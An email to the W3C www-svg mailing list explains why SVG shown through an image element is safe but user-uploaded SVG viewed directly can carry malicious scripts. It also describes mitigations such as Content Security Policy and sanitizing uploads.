- From: Amelia Bellamy-Royds <amelia.bellamy.royds@gmail.com>
- Date: Wed, 17 Aug 2016 14:55:45 -0600
- To: www-svg <www-svg@w3.org>, David Dailey <ddailey@zoominternet.net>
- Message-ID: <CAFDDJ7w9OzeweTBak1OC3-T2AJJtHdUtZthJ6wUgEowL6iGoCg@mail.gmail.com>
In a separate thread, David Dailey referenced my last email, saying: Now, if as Amelia points out[1], folks can work on convincing places like > FB, Google Plus, Twitter and Wikipedia that SVG in <img> adds value to > their platforms – and is safe--, the web will become a richer place. Am I > correct in concluding from what I read at the links you provided, Amelia, > that SVG in <img> is, as much as anything on the web, safe right now? > [1] https://lists.w3.org/Archives/Public/www-svg/2016Aug/0030.html That's an oversimplification. Sorry if I made it seem like a solved problem. It is true that, while I am viewing the SVG as an embedded image, it is safe, and can't access or modify the rest of the HTML page. Therefore, embedding an SVG as an image in your website is safe if it is hosted on an external domain. This is what Ello does, embedding the SVG images that you host on your own website. The *risk* is in hosting and serving unknown SVG files from your web domain, if that domain also hosts private content that normally requires authentication to access. Which covers a lot of social media use cases. User-uploaded SVG files are still a potential security risk, just like user-uploaded HTML or JavaScript, because the file can always be viewed independently, and the security limitations of the image element no longer apply. For example, if I were to upload an awesome-looking but secretly malicious SVG (that someone had shared with me) to a host service, and then view that hosted SVG in an active tab (because the person who shared it told me that it looks better full-screen), it could run scripts that fetched all my other private images hosted on that service and forwards them to a 3rd party server. An HTTP Content Security Policy directive used by the host server and enforced by my web browser could prevent this. However, there are still many browsers in use which don't enforce CSP: http://caniuse.com/#feat= contentsecuritypolicy Host servers could of course strip and sanitize SVG, just like they sanitize HTML comments and other uploaded content (and other images, too, by processing them to remove metadata). For example, they could remove all script tags and event handler attributes, and maybe all external references. But so far there hasn't been enough user demand to convince the larger social media companies to do the same. ~ABR
Received on Wednesday, 17 August 2016 20:56:14 UTC